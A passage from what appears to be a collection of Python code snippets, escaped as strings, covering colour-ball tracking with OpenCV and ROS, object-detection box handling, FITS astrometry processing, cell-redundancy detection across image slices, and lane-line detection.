magentaLower, magentaUpper)\n mask_m = cv2.erode(mask_m, None, iterations=2)\n mask_m = cv2.dilate(mask_m, None, iterations=2)\n #cv2.imshow('mask', mask)\n\n cnts_blk = cv2.findContours(mask_blk.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_r = cv2.findContours(mask_r.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_y = cv2.findContours(mask_y.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_g = cv2.findContours(mask_g.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_blu = cv2.findContours(mask_blu.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\tcnts_m = cv2.findContours(mask_m.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n cnts_blk = imutils.grab_contours(cnts_blk)\n\tcnts_r = imutils.grab_contours(cnts_r)\n\tcnts_y = imutils.grab_contours(cnts_y)\n\tcnts_g = imutils.grab_contours(cnts_g)\n\tcnts_blu = imutils.grab_contours(cnts_blu)\n\tcnts_m = imutils.grab_contours(cnts_m)\n\n center = None\n\tc = 0\n\tradius = 0\n\n\tglobal black_ball, red_ball, yellow_ball, green_ball, blue_ball, magenta_ball\n\n # only proceed if at least one contour was found\n if len(cnts_blk) > 0 and black_ball.detected_flag != True:\n c = max(cnts_blk, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t black_ball = track(radius, center, black_ball)\n\t pub_blackBall.publish(black_ball)\n\t print (\"Black ball detected.\\n\")\n\n\telif len(cnts_r) > 0 and red_ball.detected_flag != True:\n c = max(cnts_r, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t red_ball = track(radius, center, red_ball)\n\t pub_redBall.publish(red_ball)\n\t print (\"Red ball detected.\\n\")\n\t \n\telif len(cnts_y) > 0 and yellow_ball.detected_flag != True:\n c = max(cnts_y, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t yellow_ball = track(radius, center, yellow_ball)\n\t pub_yellowBall.publish(yellow_ball)\n\t print (\"Yellow ball detected.\\n\")\n\n\telif len(cnts_g) > 0 and green_ball.detected_flag != True:\n c = max(cnts_g, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t green_ball = track(radius, center, green_ball)\n\t pub_greenBall.publish(green_ball)\n\t print (\"Green ball detected.\\n\")\n\n\telif len(cnts_blu) > 0 and blue_ball.detected_flag != True:\n c = max(cnts_blu, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t blue_ball = 
track(radius, center, blue_ball)\n\t pub_blueBall.publish(blue_ball)\n\t print (\"Blue ball detected.\\n\")\n\n\telif len(cnts_m) > 0 and magenta_ball.detected_flag != True:\n c = max(cnts_m, key=cv2.contourArea)\n\t ((x, y), radius) = cv2.minEnclosingCircle(c)\n\t M = cv2.moments(c)\n\t center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\t cv2.circle(image_np, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n\t cv2.circle(image_np, center, 5, (0, 0, 255), -1)\n\t magenta_ball = track(radius, center, magenta_ball)\n\t pub_magentaBall.publish(magenta_ball)\n\t print (\"Magenta ball detected.\\n\")\n\n\tcv2.imshow('window', image_np)\n\tcv2.waitKey(2)\n\tc = 0", "def vis_detections(im, class_name, dets, image_name, thresh=0.5):\n inds = np.where(dets[:, -1] >= thresh)[0]\n max_inds = 0\n max_score = 0.0\n if len(inds) == 0:\n # print('Warning: no target detected!')\n return\n elif len(inds) > 1:\n # print('Warning: ' + str(len(inds)) + ' targets detected! Choose the highest one')\n for i in inds:\n if(dets[i, -1] > max_score):\n max_inds = i\n max_score = dets[i, -1]\n\n# im = im[:, :, (2, 1, 0)]\n# fig, ax = plt.subplots(figsize=(12, 12))\n# ax.imshow(im, aspect='equal')\n # for i in inds:\n # bbox = dets[i, :4]\n # score = dets[i, -1]\n #print max_inds\n bbox = dets[max_inds, :4]\n score = dets[max_inds, -1]\n\n# ax.add_patch(\n# plt.Rectangle((bbox[0], bbox[1]),\n# bbox[2] - bbox[0],\n# bbox[3] - bbox[1], fill=False,\n# edgecolor='red', linewidth=3.5)\n# )\n# ax.text(bbox[0], bbox[1] - 2,\n# '{:s} {:.3f}'.format(class_name, score),\n# bbox=dict(facecolor='blue', alpha=0.5),\n# fontsize=14, color='white')\n\n # end for\n #print image_name, class_name\n #print score\n # file.writelines([image_name,'\\t',class_name,'\\t',str(score),'\\n'])\n # ax.set_title(('{} detections with '\n # 'p({} | box) >= {:.1f}').format(class_name, class_name,\n # thresh),fontsize=14)\n # plt.axis('off')\n # plt.tight_layout()\n # plt.draw()\n\t### SAVE IMAGES ? ###\n save_img_dir = os.path.join(cfg.ROOT_DIR, 'result', 'test_img')\n # if not os.path.exists(save_img_dir):\n # os.makedirs(save_img_dir)\n # plt.savefig(os.path.join(save_img_dir, image_name + '_' + class_name))\n\n boxes = {'boxes': ((bbox[0], bbox[1]), bbox[2] - bbox[0], bbox[3] - bbox[1])}\n \n save_mat_dir = os.path.join(cfg.ROOT_DIR, 'result', 'test_box')", "def main():\n print(\"Program version: 1.5\")\n StartTime = datetime.now()\n args = parseArguments()\n\n verbose = args.verbose\n images = args.images\n ignore_warnings = args.ignore_warnings\n if(args.silent):\n verbose = False\n images = False\n ignore_warnings = True\n\n if(args.images):\n plt.ioff()\n\n if(args.ignore_warnings):\n warnings.simplefilter('ignore', UserWarning)\n\n #sample header keywords\n # OBJECT = 'P016+03_P1_JKdeep' / Original target\n # RA = ' 01:06:37.759' / 01:06:37.7 RA (J2000) pointing\n # DEC = ' 03:32:36.096' / 03:32:36.0 DEC (J2000) pointing\n # EQUINOX = 2000. / Standard FK5 (years)\n # RADECSYS= 'FK5 ' / Coordinate reference frame\n # CRVAL1 = 16.65733 / 01:06:37.7, RA at ref pixel\n # CRVAL2 = 3.54336 / 03:32:36.0, DEC at ref pixel\n # CRPIX1 = 447. /Ref pixel in X\n # CRPIX2 = 452. 
/ Ref pixel in Y\n # CDELT1 = -8.0000000000000E-5 / SS arcsec per pixel in RA\n # CDELT2 = 8.00000000000003E-5 / SS arcsec per pixel in DEC\n # CTYPE1 = 'RA---TAN' / pixel coordinate system\n # CTYPE2 = 'DEC--TAN' / pixel coordinate system\n # PC1_1 = 0.000000 / Translation matrix element\n # PC1_2 = 1.000000 / Translation matrix element\n # PC2_1 = -1.000000 / Translation matrix element\n # PC2_2 = 0.000000 / Translation matrix element\n\n fits_image_filenames = args.input\n\n #if directory given search for appropriate fits files\n\n if(os.path.isdir(fits_image_filenames[0])):\n print(\"detected a directory. Will search for fits files in it\")\n path = fits_image_filenames[0]\n fits_image_filenames = []\n for file in os.listdir(path):\n if file.endswith(\".fits\") and \"_astro\" not in file:\n fits_image_filenames.append(path+\"/\"+file)\n print(fits_image_filenames)\n\n multiple = False\n if(len(fits_image_filenames)>1):\n multiple = True\n not_converged = []\n converged_counter = 0\n for fits_image_filename in fits_image_filenames:\n\n result,_ = astrometry_script(fits_image_filename, catalog=args.catalog, rotation_scaling=0, xy_transformation=args.xy_transformation, fine_transformation=args.fine_transformation,\n images=images, vignette=args.vignette,vignette_rectangular=args.vignette_rectangular, cutouts=args.cutout, ra=args.ra, dec=args.dec, projection_ra=args.projection_ra, projection_dec=args.projection_dec, verbose=verbose, save_images=args.save_images, ignore_header_rot=args.ignore_header_rot, radius = args.radius, save_bad_result=args.save_bad_result, silent =args.silent, sigma_threshold_for_source_detection= args.sigma_threshold_for_source_detection, high_res=args.high_resolution, hdul_idx=args.hdul_idx, filename_for_sources=args.filename_for_sources, FWHM=args.seeing)\n\n if((not result) and args.rotation_scaling):\n print(\"Did not converge. 
Will try again with full rotation and scaling\")\n result, _ = astrometry_script(fits_image_filename, catalog=args.catalog, rotation_scaling=args.rotation_scaling, xy_transformation=args.xy_transformation, fine_transformation=args.fine_transformation,\n images=images, vignette=args.vignette,vignette_rectangular=args.vignette_rectangular, cutouts=args.cutout, ra=args.ra, dec=args.dec, projection_ra=args.projection_ra, projection_dec=args.projection_dec, verbose=verbose, save_images=args.save_images, ignore_header_rot=args.ignore_header_rot, radius = args.radius, save_bad_result=args.save_bad_result, silent=args.silent, sigma_threshold_for_source_detection=args.sigma_threshold_for_source_detection, high_res=args.high_resolution, hdul_idx=args.hdul_idx, filename_for_sources=args.filename_for_sources, FWHM=args.seeing)\n\n if(result):\n print(\"Astrometry was determined to be good.\")\n converged_counter = converged_counter+1\n else:\n print(\"Astrometry was determined to be bad.\")\n not_converged.append(fits_image_filename)\n if(args.save_bad_result):\n print(\"Result was saved anyway\")\n else:\n print(\"Result was not saved.\")\n # print(\"\")\n # print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n # print(\"> Astrometry for {} \".format(fits_image_filename))\n #\n # with fits.open(fits_image_filename) as hdul:\n # #print(hdul.info())\n # if(args.verbose):\n # print(\"if image is not at first position in the fits file the program will break later on\")\n # #print(hdul[0].header)\n #\n # hdu = hdul[0]\n # #hdu.verify('fix')\n # hdr = hdu.header\n #\n #\n # image_or = hdul[0].data.astype(float)\n # median = np.nanmedian(image_or)\n # image_or[np.isnan(image_or)]=median\n # image = image_or - median\n #\n # observation = find_sources(image, args.vignette)\n # #print(observation)\n #\n # positions = (observation['xcenter'], observation['ycenter'])\n # apertures = CircularAperture(positions, r=4.)\n #\n #\n # #world coordinates\n # print(\">Info found in the file -- (CRVAl: position of central pixel (CRPIX) on the sky)\")\n # print(WCS(hdr))\n #\n # hdr[\"NAXIS1\"] = image.shape[0]\n # hdr[\"NAXIS2\"] = image.shape[1]\n #\n # #wcsprm = Wcsprm(hdr.tostring().encode('utf-8')) #everything else gave me errors with python 3, seemed to make problems with pc conversios, so i wwitched to the form below\n # wcsprm = WCS(hdr).wcs\n # wcsprm_original = WCS(hdr).wcs\n # if(args.verbose):\n # print(WCS(wcsprm.to_header()))\n # wcsprm, fov_radius, INCREASE_FOV_FLAG, PIXSCALE_UNCLEAR = read_additional_info_from_header(wcsprm, hdr, args.ra, args.dec, args.projection_ra, args.projection_dec)\n # if(args.verbose):\n # print(WCS(wcsprm.to_header()))\n #\n # #print(wcsprm)\n # #wcsprm.pc = [[2, 0],[0,1]]\n #\n #\n # #Possibly usefull examples of how to use wcsprm:\n # #print(wcsprm.set())\n # #print(wcsprm.get_pc())\n # #pc = wcsprm.get_pc()\n # #print(np.linalg.det(pc))\n # #print(wcsprm.get_cdelt())\n # #wcs.fix()\n # #print(wcsprm.print_contents())\n # #print(repr(hdr.update(wcsprm.to_header().encode('utf-8')))) #not working\n #\n # #hdu.verify(\"fix\")\n # #print(repr(hdr))\n # #wcs.wcs_pix2world(pixcrd, 1)\n # #wcs.wcs_world2pix(world, 1)\n # #wcs.wcs.crpix = [-234.75, 8.3393]\n # # wcs.wcs.cdelt = np.array([-0.066667, 0.066667])\n # # wcs.wcs.crval = [0, -90]\n # # wcs.wcs.ctype = [\"RA---AIR\", \"DEC--AIR\"]\n # # wcs.wcs.set_pv([(2, 1, 45.0)])\n # # For historical compatibility, three alternate specifications of the linear transformations\n # # are available in wcslib. 
The canonical PCi_ja with CDELTia, CDi_ja, and the deprecated CROTAia\n # # keywords. Although the latter may not formally co-exist with PCi_ja,\n # # the approach here is simply to ignore them if given in conjunction with PCi_ja.\n # # has_pc, has_cd and has_crota can be used to determine which of these alternatives are present in the header.\n # # These alternate specifications of the linear transformation matrix are translated immediately to PCi_ja by set\n # # and are nowhere visible to the lower-level routines. In particular, set resets cdelt to unity if CDi_ja is present\n # # (and no PCi_ja). If no CROTAia is associated with the latitude axis, set reverts to a unity PCi_ja matrix.\n #\n #\n #\n #\n #\n # #get rough coordinates\n # #print(hdr[\"RA\"])\n # #coord = SkyCoord(hdr[\"RA\"], hdr[\"DEC\"], unit=(u.hourangle, u.deg), frame=\"icrs\")\n # coord = SkyCoord(wcsprm.crval[0], wcsprm.crval[1], unit=(u.deg, u.deg), frame=\"icrs\")\n # if(not PIXSCALE_UNCLEAR):\n # if(wcsprm.crpix[0] < 0 or wcsprm.crpix[1] < 0 or wcsprm.crpix[0] > image.shape[0] or wcsprm.crpix[1] > image.shape[1] ):\n # print(\"central value outside of the image, moving it to the center\")\n # coord_radec = wcsprm.p2s([[image.shape[0]/2, image.shape[1]/2]], 0)[\"world\"][0]\n # coord = SkyCoord(coord_radec[0], coord_radec[1], unit=(u.deg, u.deg), frame=\"icrs\")\n # #print(wcsprm)\n #\n #\n #\n # #better: put in nice wrapper! with repeated tries and maybe try synchron!\n # print(\">Dowloading catalog data\")\n # radius = u.Quantity(fov_radius, u.arcmin)#will prob need more\n # catalog_data = query.get_data(coord, radius, args.catalog)\n # #reference = reference.query(\"mag <20\")\n # max_sources = 500\n # if(INCREASE_FOV_FLAG):\n # max_sources= max_sources*2.25 #1.5 times the radius, so 2.25 the area\n # if(catalog_data.shape[0]>max_sources):\n # catalog_data = catalog_data.nsmallest(400, \"mag\")\n #\n # if(args.catalog == \"GAIA\" and catalog_data.shape[0] < 5):\n # print(\"GAIA seems to not have enough objects, will enhance with PS1\")\n # catalog_data2 = query.get_data(coord, radius, \"PS\")\n # catalog_data = pd.concat([catalog_data, catalog_data2])\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # print(\"Now we have a total of {} sources. Keep in mind that there might be duplicates now since we combined 2 catalogs\".format(catalog_data.shape[0]))\n # elif(args.catalog == \"PS\" and (catalog_data is None or catalog_data.shape[0] < 5)):\n # print(\"We seem to be outside the PS footprint, enhance with GAIA data\")\n # catalog_data2 = query.get_data(coord, radius, \"GAIA\")\n # catalog_data = pd.concat([catalog_data, catalog_data2])\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # print(\"Now we have a total of {} sources. 
Keep in mind that there might be duplicates now since we combined 2 catalogs\".format(catalog_data.shape[0]))\n #\n # #remove duplicates in catalog?\n #\n # apertures_catalog = CircularAperture(wcsprm.s2p(catalog_data[[\"ra\", \"dec\"]], 1)['pixcrd'], r=5.)\n #\n #\n # #plotting what we have, I keep it in the detector field, world coordinates are more painfull to plot\n # if(args.images):\n # fig = plt.figure()\n # fig.canvas.set_window_title('Input for {}'.format(fits_image_filename))\n # plt.xlabel(\"pixel x direction\")\n # plt.ylabel(\"pixel y direction\")\n # plt.title(\"Input - red: catalog sources, blue: detected sources in img\")\n # plt.imshow(image,cmap='Greys', origin='lower', norm=LogNorm())\n # apertures.plot(color='blue', lw=1.5, alpha=0.5)\n # apertures_catalog.plot(color='red', lw=1.5, alpha=0.5)\n #\n # plt.xlim(-200,image.shape[0]+200)\n # plt.ylim(-200,image.shape[1]+200)\n # if(args.save_images):\n # name_parts = fits_image_filename.rsplit('.', 1)\n # plt.savefig(name_parts[0]+\"_image_before.pdf\")\n #\n # ###tranforming to match the sources\n # print(\"---------------------------------\")\n # print(\">Finding the transformation\")\n # if(args.rotation_scaling):\n # print(\"Finding scaling and rotation\")\n # wcsprm = register.get_scaling_and_rotation(observation, catalog_data, wcsprm, scale_guessed=PIXSCALE_UNCLEAR, verbose=args.verbose)\n # if(args.xy_transformation):\n # print(\"Finding offset\")\n # wcsprm,_,_ = register.offset_with_orientation(observation, catalog_data, wcsprm, fast=False , INCREASE_FOV_FLAG=INCREASE_FOV_FLAG, verbose= args.verbose)\n #\n # #correct subpixel error\n # obs_x, obs_y, cat_x, cat_y, distances = register.find_matches(observation, catalog_data, wcsprm, threshold=3)\n # rms = np.sqrt(np.mean(np.square(distances)))\n # best_score = len(obs_x)/(rms+10) #start with current best score\n # fine_transformation = False\n # if(args.fine_transformation):\n # for i in [2,3,5,8,10,6,4, 20,2,1,0.5]:\n # wcsprm_new, score = register.fine_transformation(observation, catalog_data, wcsprm, threshold=i)\n # if(score> best_score):\n # wcsprm = wcsprm_new\n # best_score = score\n # fine_transformation = True\n # if not fine_transformation:\n # print(\"Fine transformation did not improve result so will be discarded.\")\n # else:\n # print(\"Fine transformation applied to improve result\")\n # #register.calculate_rms(observation, catalog_data,wcs)\n #\n # #make wcsprim more physical by moving scaling to cdelt, out of the pc matrix\n # wcs =WCS(wcsprm.to_header())\n # if(args.verbose):\n # print(wcs)\n #\n # from astropy.wcs import utils\n # scales = utils.proj_plane_pixel_scales(wcs)\n # print(scales)\n # cdelt = wcsprm.get_cdelt()\n # print(cdelt)\n # scale_ratio = scales/cdelt\n # #print(scale_ratio)\n # pc = np.array(wcsprm.get_pc())\n # pc[0,0] = pc[0,0]/scale_ratio[0]\n # pc[1,0] = pc[1,0]/scale_ratio[1]\n # pc[0,1] = pc[0,1]/scale_ratio[0]\n # pc[1,1] = pc[1,1]/scale_ratio[1]\n # wcsprm.pc = pc\n # wcsprm.cdelt = scales\n # if(args.verbose):\n # print(\"moved scaling info to CDelt\")\n # print(WCS(wcsprm.to_header()))\n #\n # #WCS difference before and after\n # print(\"> Compared to the input the Wcs was changed by: \")\n # scales_original = utils.proj_plane_pixel_scales(WCS(hdr))\n # print(\"WCS got scaled by {} in x direction and {} in y direction\".format(scales[0]/scales_original[0], scales[1]/scales_original[1]))\n # #sources:\n # #https://math.stackexchange.com/questions/2113634/comparing-two-rotation-matrices\n # 
#https://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python/13849249#13849249\n # def unit_vector(vector):\n # \"\"\" Returns the unit vector of the vector. \"\"\"\n # return vector / max(np.linalg.norm(vector), 1e-10)\n # def matrix_angle( B, A ):\n # \"\"\" comment cos between vectors or matrices \"\"\"\n # Aflat = A.reshape(-1)\n # Aflat = unit_vector(Aflat)\n # Bflat = B.reshape(-1)\n # Bflat = unit_vector(Bflat)\n # #return np.arccos((np.dot( Aflat, Bflat ) / max( np.linalg.norm(Aflat) * np.linalg.norm(Bflat), 1e-10 )))\n # return np.arccos(np.clip(np.dot(Aflat, Bflat), -1.0, 1.0))\n # #print(matrix_angle(wcsprm.get_pc(), wcsprm_original.get_pc()) /2/np.pi*360)\n # rotation_angle = matrix_angle(wcsprm.get_pc(), wcsprm_original.get_pc()) /2/np.pi*360\n # if((wcsprm.get_pc() @ wcsprm_original.get_pc() )[0,1] > 0):\n # text = \"counterclockwise\"\n # else:\n # text = \"clockwise\"\n # print(\"Rotation of WCS by an angle of {} deg \".format(rotation_angle)+text)\n # old_central_pixel = wcsprm_original.s2p([wcsprm.crval], 0)[\"pixcrd\"][0]\n # print(\"x offset: {} px, y offset: {} px \".format(wcsprm.crpix[0]- old_central_pixel[0], wcsprm.crpix[1]- old_central_pixel[1]))\n #\n #\n # #check final figure\n # if(args.images):\n # fig = plt.figure()\n # fig.canvas.set_window_title('Result for {}'.format(fits_image_filename))\n # plt.xlabel(\"pixel x direction\")\n # plt.ylabel(\"pixel y direction\")\n # plt.title(\"Result - red: catalog sources, blue: detected sources in img\")\n # plt.imshow(image,cmap='Greys', origin='lower', norm=LogNorm())\n # apertures.plot(color='blue', lw=1.5, alpha=0.5)\n # #apertures_catalog = CircularAperture(wcs.wcs_world2pix(catalog_data[[\"ra\", \"dec\"]], 1), r=5.)\n # apertures_catalog = CircularAperture(wcsprm.s2p(catalog_data[[\"ra\", \"dec\"]], 1)['pixcrd'], r=5.)\n #\n # apertures_catalog.plot(color='red', lw=1.5, alpha=0.5)\n # if(args.save_images):\n # name_parts = fits_image_filename.rsplit('.', 1)\n # plt.savefig(name_parts[0]+\"_image_after.pdf\")\n #\n # print(\"--- Evaluate how good the transformation is ----\")\n # register.calculate_rms(observation, catalog_data,wcsprm)\n #\n #\n # #updating file\n # write_wcs_to_hdr(fits_image_filename, wcsprm)\n #\n #\n # print(\"overall time taken\")\n # print(datetime.now()-StartTime)\n # if(args.images):\n # plt.show()\n if(multiple):\n print(\">> Final report:\")\n print(\"Processed {} files, {} of them did converge. The following files failed:\".format(len(fits_image_filenames), converged_counter))\n print(not_converged)\n print(\"-- finished --\")", "def _red_detect_(self, nslice = 0, thresh = 2.0):\n zk_1 = 's_' + format(nslice, '03d')\n zk_2 = 's_' + format(nslice+1, '03d')\n\n zf_1 = self.z_dense[zk_1]\n zf_2 = self.z_dense[zk_2]\n\n # extract the y and x coordinates\n y1 = zf_1[:,0]\n x1 = zf_1[:,1]\n\n y2 = zf_2[:,0]\n x2 = zf_2[:,1]\n\n\n # create a meshgrid\n [YC, YR] = np.meshgrid(y2, y1)\n [XC, XR] = np.meshgrid(x2, x1)\n\n\n dist_block = np.sqrt((YC-YR)**2 + (XC-XR)**2)\n red_pair = np.where(dist_block <= thresh) # find out where the distance between cell i in plane k and cell j in plane k+1 is below the threshold.\n\n ind1 = red_pair[0] # the indices in the first frame\n ind2 = red_pair[1] # the indices in the second frame\n\n\n # select those with markers > 0 and markers < 0\n marker_1 = zf_1[ind1, 3]\n\n\n new_idx = (marker_1 == 0) # select those with zero-markers, which are never counted before. These are new cells. 
marker_1 needs to be updated.\n pool_new = ind1[new_idx] # select the indices in the first frame where new redundancies are detected \n pool_new_cov = ind2[new_idx] # select the indices in the second frame where new redundancies are detected.\n\n\n pool_exist = ind1[~new_idx] # among the detected redundancies, find those already marked.\n pool_exist_cov = ind2[~new_idx] # correspondingly, find those already marked in the adjacent slice\n\n n_new = len(pool_new)\n n_exist = len(pool_exist)\n if self.verbose:\n print(n_new, \"new redundancies, \", n_exist, \"existing redundancies\")\n\n for n_count in np.arange(n_new):\n # build the new keys\n # also, we need to assign each new key an identity number which is unique.\n n_ind1 = pool_new[n_count] # find the indices in the first slice that contains new redundancies\n n_ind2 = pool_new_cov[n_count] # find the indices in the following slice \n pr_number = nslice * 1000 + n_ind1\n pr_key = 'sl_' + str(pr_number) # build a key \n new_sl = Simple_list(nslice) # create a simple list with z_marker = nslice, nslice is the index of the first z-slice \n new_sl.add([nslice, zf_1[n_ind1, 4]])\n new_sl.add([nslice+1, zf_2[n_ind2, 4]])\n zf_1[n_ind1, 3] = pr_number # assign the new pr_number to zf_1\n zf_2[n_ind2, 3] = pr_number # assigne the same new pr_number to zf_2\n\n self.redundancy_pool[pr_key] = new_sl # stored into the redundancy pool\n\n\n for n_count in np.arange(n_exist):\n # search for the existing keys\n n_ind1 = pool_exist[n_count]\n n_ind2 = pool_exist_cov[n_count]\n pr_number = int(zf_1[n_ind1, 3])# catch up the pr_number\n pr_key = 'sl_' + str(pr_number) # this pr_key should already exist in the pool. \n\n self.redundancy_pool[pr_key].add([nslice+1, zf_2[n_ind2, 4]])\n zf_2[n_ind2, 3] = pr_number # update the pr_number in the adjacent slice", "def process_image(image):\n \n # (step 1) get gray image\n gray = grayscale(image)\n \n # (step 2) do gaussian blur with kernel size is 3\n blur_gray = gaussian_blur(gray, 3)\n \n # (step 3) do canny edge detction with low 50 and hight 150\n canny_edges = canny(blur_gray, 50, 150)\n \n # (step 4) region of interset\n imshape = image.shape\n left_bottom = (50,imshape[0])\n right_bottom = (imshape[1]-50,imshape[0])\n left_top = (420, 330)\n right_top = (imshape[1]-420, 330)\n # used later to discard lines which are out of the ROI\n polygon = Polygon([(50,imshape[0]+1),(imshape[1]-50,imshape[0]+1), (imshape[1]-420, 329), (420, 329)])\n vertices = np.array([[left_bottom,left_top, right_top, right_bottom]], dtype=np.int32)\n masked_edge = region_of_interest(canny_edges, vertices)\n \n # (step 5) get lane lines from hough transform\n rho = 2\n theta = np.pi/18 \n threshold = 15\n min_line_length = 10\n max_line_gap = 20\n lines = hough_lines(masked_edge, rho, theta, threshold, min_line_length, max_line_gap)\n \n # (step 6) seperate left and right lines\n left_lines = []\n right_lines = []\n for line in lines:\n for x1,y1,x2,y2 in line:\n if y1 > y2:\n temp_line = [x1,y1,x2,y2]\n if x2 != x1:\n m = (float(y2) - float(y1)) / (float(x2) - float(x1))\n else:\n m = 1000 # it will be dicarded, any high value will work\n temp_line.append(m)\n if x1 < x2:\n left_lines.append(temp_line)\n else:\n right_lines.append(temp_line)\n else:\n temp_line = [x2,y2,x1,y1]\n if x2 != x1:\n m = (float(y1) - float(y2)) / (float(x1) - float(x2))\n else:\n m = 1000\n temp_line.append(m)\n if x1 > x2:\n left_lines.append(temp_line)\n else:\n right_lines.append(temp_line)\n \n # (step 7) get left and right lines slopes, can be done 
with step 6 although\n left_slop = []\n for left_line in left_lines:\n x1 = left_line[0]; y1 = left_line[1]; x2 = left_line[2]; y2 = left_line[3]; \n if x1 != x2:\n left_slop.append( (float(y2) - float(y1)) / (float(x2) - float(x1)) )\n average_left_slop = sum(left_slop)/len(left_slop) # not used yet\n \n right_slop = []\n for right_line in right_lines:\n x1 = right_line[0]; y1 = right_line[1]; x2 = right_line[2]; y2 = right_line[3]; \n if x1 != x2:\n right_slop.append( (float(y2) - float(y1)) / (float(x2) - float(x1)) )\n average_right_slope = sum(right_slop)/len(right_slop) # not used yet\n \n \n # (step 8) delete left lines which deviate from thersold_s slope\n thersold_s = 0.4\n delet_left_index = []\n i = 0\n for left_line in left_lines:\n x1 = left_line[0]; y1 = left_line[1]; x2 = left_line[2]; y2 = left_line[3]; m = left_line[4]; \n if abs(m) < thersold_s:\n delet_left_index.append(i)\n i=i+1\n for i in range((len(delet_left_index)-1), -1, -1):\n del left_lines[delet_left_index[i]]\n \n # (step 9) delete right lines which deviate from average slope\n delet_index_right = []\n i = 0\n for right_line in right_lines:\n x1 = right_line[0]; y1 = right_line[1]; x2 = right_line[2]; y2 = right_line[3]; m = right_line[4]; \n if abs(m) < thersold_s:\n delet_index_right.append(i)\n i=i+1\n for i in range((len(delet_index_right)-1), -1, -1):\n del right_lines[delet_index_right[i]]\n \n # (step 10) extrapolate left and right lines\n left_line_draw = True\n x_lefts = []\n y_lefts = []\n for line in left_lines:\n x1, y1, x2, y2, m = line\n x_lefts.append(x1)\n x_lefts.append(x2) \n y_lefts.append(y1)\n y_lefts.append(y2)\n \n if len(x_lefts) > 0:\n slope_left, c_left = np.polyfit(x_lefts, y_lefts, 1)\n else:\n slope_left, c_left = 1, 1\n left_line_draw = False\n \n right_line_draw = True\n x_rights = []\n y_rights = []\n for line in right_lines:\n x1, y1, x2, y2, m = line\n x_rights.append(x1)\n x_rights.append(x2)\n y_rights.append(y1)\n y_rights.append(y2)\n if len(x_rights) > 0:\n slope_right, c_right = np.polyfit(x_rights, y_rights, 1)\n else:\n slope_right, c_right = 1, 1\n right_line_draw = False\n \n y1_left = 530 # again hardcoded values, from ROI\n y2_left = 330 # again hardcoded values, from ROI\n x1_left = int((y1_left - c_left) / slope_left)\n x2_left = int((y2_left - c_left) / slope_left)\n \n y1_right = 530 # again hardcoded values, from ROI\n y2_right = 330 # again hardcoded values, from ROI \n x1_right = int((y1_right - c_right) / slope_right)\n x2_right = int((y2_right - c_right) / slope_right)\n \n # (step 11) check if left/right line is out of ROI\n left_point1 = Point(x1_left, y1_left)\n left_point2 = Point(x2_left, y2_left)\n \n right_point1 = Point(x1_right, y1_right)\n right_point2 = Point(x2_right, y2_right)\n \n if polygon.contains(left_point1) and polygon.contains(left_point2):\n left_line_draw = True\n else:\n #print (\"left line out\", left_point1, left_point2)\n left_line_draw = False\n \n if polygon.contains(right_point1) and polygon.contains(right_point2):\n right_line_draw = True\n else:\n #print (\"right line out\", right_point1, right_point2)\n right_line_draw = False\n \n \n # (step 12) draw lines\n line_image = np.copy(image)\n # Draw the right and left lines on image\n if left_line_draw:\n cv2.line(line_image, (x1_left, y1_left), (x2_left, y2_left), (255,0,0),5)\n if right_line_draw:\n cv2.line(line_image, (x1_right, y1_right), (x2_right, y2_right), (255,0,0),5)\n \n # Create a \"color\" binary image to combine with line image\n color_edges = 
